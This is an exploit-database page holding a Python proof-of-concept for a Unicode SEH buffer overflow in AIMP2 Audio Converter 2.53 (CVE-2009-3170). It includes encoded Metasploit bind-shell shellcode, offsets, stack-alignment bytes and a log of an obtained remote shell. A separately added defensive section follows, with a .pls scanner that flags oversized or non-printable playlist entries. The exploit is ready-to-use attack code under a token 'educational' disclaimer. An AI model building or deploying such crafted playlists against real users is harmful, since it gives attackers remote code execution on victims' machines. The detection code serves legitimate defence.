0day Today Exploits Market and 0day Exploits Database

AIMP2 Audio Converter <= 2.53 build 330 Playlist (.pls) Unicode BOF

Author: mr_me
Risk: Security Risk Unsorted
0day-ID: 0day-ID-8157
Category: local exploits
Date added: 21-11-2009
Platform: unsorted
===================================================================
AIMP2 Audio Converter <= 2.53 build 330 Playlist (.pls) Unicode BOF
===================================================================



# Title: AIMP2 Audio Converter <= 2.53 build 330 Playlist (.pls) Unicode BOF
# CVE-ID: (CVE-2009-3170)
# OSVDB-ID: ()
# Author: mr_me
# Published: 2009-11-21
# Verified: yes

#!/usr/bin/python
#
# ######################################################################
#
# *** For educational purposes only ***
#        You have been warned
#
# My original crash breakdown:
#
# EAX 001B0020 UNICODE "AAAAAAAAAAAAAAAAAAAA~
# ECX 00000273
# EDX 00000C4C
# EBX 00000000
# ESP 0012DCA8
# EBP 0012DD64
# ESI 001B6610 UNICODE "AAAAAAAAAAAAAAAAAAAA~
# EDI 00130000 ASCII "Actx "
# EIP 004530C6 AIMP2.004530C6
#
# And then when we pass the exception handler to overwrite EIP...
#
# EIP 00410041
#
# The Info:
#
# I knew this exploit was always possible, but I failed to have the knowledge
# and experience to complete it. Many thanks goes to corelanc0d3r for
# demonstrating this unicode concept on his blog. I downloaded his PoC, however it
# did not work on my VM, so I remade it with some fun shellcode :)
#
# Visit corelanc0d3r's blog: http://www.corelan.be:8800/
#
# root@home:/home/mrme# nc -v 192.168.2.6 1337
# 192.168.2.6: inverse host lookup failed: Unknown server error : Connection timed out
# (UNKNOWN) [192.168.2.6] 1337 (?) open
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\Program Files\AIMP2\Langs>
#
 
# Metasploit bind shell on port 1337
# Encoded using Skylined's alpha2 encoder
 
shellcode = ("PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQA"
"IAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1"
"111AIAJQI1AYAZBABABABAB30APB944JBKLQZJKPMK8JYKOKOKOQPTK"
"2LMTMTDKOUOLTKCLKUT8M1JOTKPOLXTKQOMPM1JKOY4KNTTKM1JNNQ9"
"04Y6LU4I0D4M77QHJLMKQ92ZKL4OK0TMTO8BUIUTK1OO4KQZK1VDKLL"
"PKTKQOMLM1ZKM3NLTKU9RLMTMLQQ7SNQ9KQTTK0CNP4KOPLL4KRPMLV"
"M4KOPLHQN384NPNLNJLPPKOJ6QVPSQVQX03OBRHT7RSNR1OB4KO8PBH"
"XKZMKLOKR0KOHVQOU9YU1VE1JMM8KRB5QZLBKOXPBH8YM9JUFMQGKOZ"
"6PSPSR30SQCPC23PCPSKOXPC6RHKUP936PSSYYQV5QX5TMJ40GWPWKO"
"8VRJLPR1R5KOHPQXG4VMNNIY0WKOZ6QC25KOXPBH9U19U6OY27KO9FP"
"PR4R41EKOXPUC1X9W49GVRYPWKO8V0UKOXP1VQZRD2FQXQSBMU9YUQZ"
"0PPYNI8LTI9W2J14U9K201GPKCUZKNORNMKNPBNL63TM2ZNXVKFK6KQ"
"XBRKNVSN6KOT5Q4KOIFQK0WB2PQ0Q0Q1ZM1PQR1PUR1KOXPRHVMJ9KU"
"8NQCKOHVQZKOKO07KOZ0DK0WKLTCWTRDKOHV0RKO8P38JPTJKTQOR3K"
"O8VKO8PKZA")
 
header = ("[playlist]\nNumberOfEntries=3\n\n");
header += ("File1=");
crash = ('\x41' * 1985)             # offset before shellcode
crash += shellcode          # add the shellcode
crash += ('\41' * (4033-len(crash)))    # remaining offset (1st block)
crash += ('\x41\x6d')               # inc ecx + add byte ptr [ebp],ch
crash += ('\x0e\x45')               # seh handler (p/p/r in aimp2.dll)
 
# We needed an address that is located at or close to our shellcode.
# We find one on the fourth address from the stack.
 
align = '\x58'              # pop eax
align += '\x6d'
align += '\x58'             # pop eax
align += '\x6d'
align += '\x58'             # pop eax
align += '\x6d'
align += '\x58'             # pop eax
align += '\x6d'
 
# Here we adjust the value of eax to the address of where our shellcode
# is (in the original buffer).
 
align += '\x05\x02\x22'         # add eax,22000200   
align += '\x6d' 
align += '\x2d\x09\x11'         # sub eax,11000900
align += '\x6d'
align += '\x2d\x09\x11'         # sub eax,11000900
align += '\x6d'  
 
# Eax now equals 0x0012EDA0, which is the location of our shellcode. We push
# eax onto the stack and jump to it so it's executed.
 
jump ='\x50'                # push eax       
jump += '\x6d' 
jump += '\xc3'              # jmp eax
 
finish = ('\x42' * (963-len(align)-len(jump)))
buffer = header + crash + align + jump + finish + '\n'
 
file=open('mr_me_owns_aimp.pls','w')
file.write(buffer)
file.close()
print "[+] mr_me_owns_aimp.pls file created successfully"
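The playlist the script writes is a plain .pls file: a [playlist] section header, a NumberOfEntries count, and File<n>= entries whose value is meant to hold a path or URL. The crash comes entirely from the length of that one File1= value, which is thousands of characters where a real path is bounded by MAX_PATH (260). The following checker is an added, defensive example and is not part of the original exploit or of AIMP2: it parses a .pls body and flags the properties that separate a crafted playlist from a normal one (an entry far longer than a path can be, non-printable characters inside a path, a missing header, and a NumberOfEntries that does not match the File entries present). The regex, the MAX_ENTRY_LEN constant and the sample playlists are assumptions constructed for this example.

```python
import re
from typing import List, Tuple

# Windows MAX_PATH. A legitimate File<n>= value in a .pls playlist is a path or
# URL and never approaches the thousands of characters a crafted entry carries.
# (Threshold chosen for this example; tighten it to your own environment.)
MAX_ENTRY_LEN = 260

# Key=Value lines as written in .pls playlists, e.g. File1=, Title1=, Length1=,
# NumberOfEntries=, Version=. The numeric suffix is optional. (Assumed format.)
_ENTRY_RE = re.compile(r'^(?P<key>[A-Za-z]+)(?P<idx>\d*)=(?P<value>.*)$')


def scan_playlist(text: str, max_len: int = MAX_ENTRY_LEN) -> List[Tuple[int, str, str]]:
    """Return a list of (line_no, key, reason) findings for the .pls body `text`.

    An empty list means nothing suspicious was seen. line_no 0 marks a finding
    about the file as a whole rather than one line.
    """
    findings: List[Tuple[int, str, str]] = []
    lines = text.splitlines()

    # A .pls file starts with the [playlist] section header.
    if not lines or lines[0].strip().lower() != '[playlist]':
        findings.append((1, 'header', 'missing [playlist] section header'))

    declared = None          # value of NumberOfEntries, if present and numeric
    file_indices = set()     # indices n seen in File<n>= lines

    for no, line in enumerate(lines, start=1):
        m = _ENTRY_RE.match(line.strip())
        if not m:
            continue
        key, idx, value = m.group('key'), m.group('idx'), m.group('value')

        if key == 'NumberOfEntries':
            declared = int(value) if value.isdigit() else None
            continue

        if key == 'File' and idx:
            file_indices.add(int(idx))

        if key in ('File', 'Title'):
            # Oversized value: the only thing the crash above needs.
            if len(value) > max_len:
                findings.append((no, key + idx,
                                 'value length %d exceeds %d' % (len(value), max_len)))
            # Paths and titles are printable text; raw control bytes are not.
            if any(not ch.isprintable() for ch in value):
                findings.append((no, key + idx, 'non-printable characters in value'))

    # Weak indicator on its own, but a crafted file rarely bothers to be consistent.
    if declared is not None and len(file_indices) != declared:
        findings.append((0, 'NumberOfEntries',
                         'declares %d entries but %d File entries present'
                         % (declared, len(file_indices))))
    return findings


# Constructed sample inputs (not files from the original page).
BENIGN_PLS = (
    "[playlist]\n"
    "NumberOfEntries=1\n"
    "File1=C:\\Music\\song.mp3\n"
    "Title1=Song\n"
    "Length1=180\n"
    "Version=2\n"
)

OVERSIZED_PLS = (
    "[playlist]\n"
    "NumberOfEntries=1\n"
    "File1=" + "A" * 3000 + "\n"
)

if __name__ == '__main__':
    for name, body in (('benign', BENIGN_PLS), ('oversized', OVERSIZED_PLS)):
        print(name, scan_playlist(body) or 'ok')
```

Run on the benign sample the function returns no findings; on the oversized one it reports the File1 entry length. Dropping any playlist with a finding before it reaches the player, or alerting on one, is the mitigation this check supports; the same length bound is what the converter itself should have enforced before copying the entry into a fixed-size buffer.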



#  0day.today [2024-07-07]  #